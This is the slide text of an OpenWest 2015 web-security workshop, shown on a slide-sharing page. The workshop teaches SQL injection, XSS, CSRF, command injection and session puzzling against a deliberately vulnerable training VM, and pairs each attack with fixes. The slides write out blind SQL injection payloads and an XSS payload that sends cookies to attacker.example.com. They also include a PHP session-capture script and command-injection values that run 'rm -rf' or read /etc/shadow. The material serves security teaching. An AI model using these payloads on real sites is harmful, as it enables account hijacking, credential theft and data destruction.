Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 

Recently uploaded (20)

The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 

Hacking sites for fun and profit

  • 1. Hacking Sites for Fun and Profit OpenWest 2015 David Stockton
  • 2. or How to Hack Websites and Prevent Your Site from Being Hacked
  • 3. What this is for • Learn how common exploits are done and how to identify code that is vulnerable • Learn how to fix code that is susceptible to these attacks • Learn how to attack your own code and your own sites so you can fix them
  • 4. What this is not for • Hacking or attacking sites that you do not have permission to attack • If you don’t have permission, don’t do it.
  • 5. The Code • The code I am showing you is similar to real code I’ve seen in real projects, but it was written specifically for this presentation.
  • 6. Gouda Times • Provided on the VM is a hackable site - The Gouda Times cheese shop and social cheese site
  • 7. What you need • Virtualbox 4.3 • The VM • A browser (preferably chrome but any works) • Something to send HTTP requests to the server on the VM
  • 8. Getting Started • Copy the contents of the thumb drive - • There are 4 files: • Virtualbox for Mac and Windows • The VM • An image
  • 9. Import the VM • Start the VM in virtual box and log into the console (vagrant / vagrant) • ifconfig -a • Find eth* • Edit /etc/sysconfig/network-scripts/ifcfg-eth1 • Change DEVICE= to match eth* from above • sudo service network restart • mailcatcher —ip=0.0.0.0
  • 10. One note about email • On the VM is mailcatcher. It will catch any emails that the system or you cause to be sent. You can access it at http:// hacksite.dev:1080/
  • 11. To play fair • Don’t go on the VM after the initial set up. However, all the code is there and if you really want to look, feel free: • /vagrant_web • Try to figure out some exploits without looking at the code first though
  • 12. On your host • Ping 192.168.33.199 • ssh vagrant@192.168.33.199 (password vagrant) • If this works, add a host entry (/etc/hosts or /windws/system32/driver/etc/hosts for hackingsite.dev to 192.168.33.199
  • 14. Start hacking • There are loads and loads of vulnerabilities • If you break the VM, just re-import and start again • This is your VM on your computer. Anything destructive you do is on you. Be sure you’re in the VM before seeing if 
 
 rm -rf /* works
  • 15. A brief introduction to common exploits • In case this is all completely new
  • 16. Exploit 1: • SQL injection • select * from users where username = '$_POST['username']';
  • 17. SQL Injection • $_POST['username'] = “' OR 1=1; --;”; • select * from users where username = '' OR 1=1; --;';
  • 18. SQL Injection • $_GET • $_POST • $_REQUEST • what else...
  • 19. SQL Injection • $_COOKIE • values from the database • Some parts of $_SERVER
  • 20. Errors can help attackers • Showing SQL errors can help attackers fix SQL injection attempts • Other errors can help in other ways (some show passwords) • Turn off display_errors in production, but log errors always
  • 21. Blind SQL injection • Make calls that take varying amounts of time to run. Use the time to determine the answers to questions about the systems you are attacking.
  • 22. Blind SQL injection • http://news.org/news.php?id=5 • http://news.org/news.php?id=5 and 1=1 • http://news.org/news.php?id=5 and 1=2
  • 23. Determine DB version • news.php?id=5 and substring(@@version, 1,1)=5
  • 25. Access to other databases/ tables • news.php?id=12 and (select 1 from mysql.user limit 0,1) = 1
  • 26. Guessing tables • news.php?id=6 and (select 1 from users limit 0,1) =1
  • 27. Guessing column names • news.php?id=11 and (select substring(concat(1, password),1,1) from users limit 0,1)=1
  • 28. Guessing data • news.php?id=4 and ascii(substring((SELECT concat(username, 0x3a, password) from users limit 0,1), 1,1))>80 • Increment to guess values letter by letter
  • 29. Preventing SQL Injection ● mysql_real_escape_string ● Prepared statements ● Input validation and whitelists
  • 30. Exploit 2: • XSS • Cross-site Scripting
  • 31. What is it? • User supplied code running in the browser
  • 32. So? It’s their browser • Yep, but it may not be their code.
  • 33. So? It’s their browser • It may not be your code, but it might call your code in a way you don’t want
  • 34. XSS Code <img src=”<?php echo $_POST[‘image’];?>”> <.. javascript to open the print dialog ..>
  • 35. So what? • What if we post code into $_POST[‘image’] ● Steal session cookies ● Call Javascript APIs to cause actions on the server (CSRF) ● Post forms as the user
  • 38. Ooh, that’s soooo malicious, I’m totally shaking right now • Fine. How about this. • image = /images/add.gif"><script type="text/ javascript">document.write('<img src="http:// attacker.example.com/session.php?' + document.cookie + '">'); </script><img src="
  • 39. WTH did that do? • Javascript ran FROM the site we’re attacking and it sent your site cookies to a script the attacker controls.
  • 40. So you stole my cookie. So what? • Here’s what. <?php
 $session = $_GET['PHPSESSID'];
 $body = 'Got session: ' . $session;
 mail('attackeremail@attacker.example.org', 'Session Captured', $body);
  • 41. Oooh, you emailed my cookie... So...
  • 42. Now it’s my turn...
  • 43. Why this matters • Sites identify and authenticate users with session. • I have identified myself as you. I am now logged in as you and can do anything you can do on the site.
  • 44. Ok, so I can steal my own session • Here’s how to use it against someone.
  • 45. The first part of the attack • Create an email to a link on the attacking site that posts the code to the site under attack. Send the email to the victim. • They click the link, you steal their session.
  • 46. What else can I do? • Cross Site Request Forgery (CSRF) • Causing actions to happen on the user’s behalf • Purchasing things, changing passwords, creating accounts, etc.
  • 47. How to prevent? • Escape output • Whitelist URLs, domains, input • Make the print page lookup and use image paths from a trusted source (database maybe?)
  • 48. Prevent CSRF • Use a CSRF token. • Disallow requests that don’t contain the correct token.
  • 49. Exploit prevention in general • Filter input • Escape output • This works for SQL injection, XSS and more... • in general
  • 50. Exploit 3: Command injection ● shell_exec ● exec ● passthru ● system ● `some command`
  • 51. PHP Web File Browser • Supposed to allow viewing of files within the web directories • $files = shell_exec(‘ls -al ’ . $_GET[‘dir’]);
  • 52. What’s the danger? • $_GET[‘dir’] = ‘.; rm -rf / *’; • Or whatever. • cat /etc/passwd; cat /etc/shadow
  • 53. How to prevent? • If you must use user input in a command, use escapeshellarg() • $dir = escapeshellarg($_GET[‘dir’]); • $files = shell_exec(‘ls -al ‘ . $dir); • Validate that the input is allowed
  • 54. Other types of injection ● Code (eval) ● Regex ● Log ● LDAP
  • 55. Other exploits ● Authentication / Session management ● Information disclosure ● Sensitive data exposure ● File upload flaws ● Unchecked redirects ● Leftover debug code ● Session fixation ● Internal threats ● Privacy Violation (password in logs, etc)
  • 56. Mitigation • Validation on the client • Reject invalid requests entirely, log intrusion attempt • Principle of least privilege • Filter input, escape output
  • 57. One more exploit • Session puzzling attack • http://bit.ly/1eO7jPK
  • 58. Session Puzzling • Making requests to privileged and unprivileged pages in a particular order that can escalate privileges of the attacker
  • 59. How it could work • Page requiring authentication looks for ‘user’ in session to determine authentication
  • 60. Session Puzzling • Login -> forgot password page sends information via ‘user’ in session
  • 61. Put it together • Hit pages quickly in this order: • Login -> forgot password / privileged page • Privileged page sees ‘user’ and allows attacker in
  • 62. How was this found? • By accident, via web crawler getting access to privileged pages
  • 63. Now what? • Find as many exploits as possible in Gouda Times • Be creative, you can use multiple exploits in a single creative hack • Stuck for ideas?
  • 64. Ideas • Trick the system to give up another user’s password • Log in to the system as another user without knowing their password • Change guestbook entries • Remove guestbook entries
  • 65. More ideas • View nearly any file on the system • Get your own code onto the system • Find hidden functionality • Exploit the site with an image • Create more users than the system thinks you should have • Social engineering - get someone to tell you a password
  • 66. Time to get with the hacking
  • 67. If you have questions or need help I’ll be around • If you get a hack to work, let me know and you can share what you did and how • If you want to try to fix it, the source is on the VM - show me your fix, I’ll try to break it
  • 68. Want to hack more? • http://www.badstore.net/ • http://google-gruyere.appspot.com/ • http://www.dvwa.co.uk/
  • 69. Please rate this tutorial • https://joind.in/14040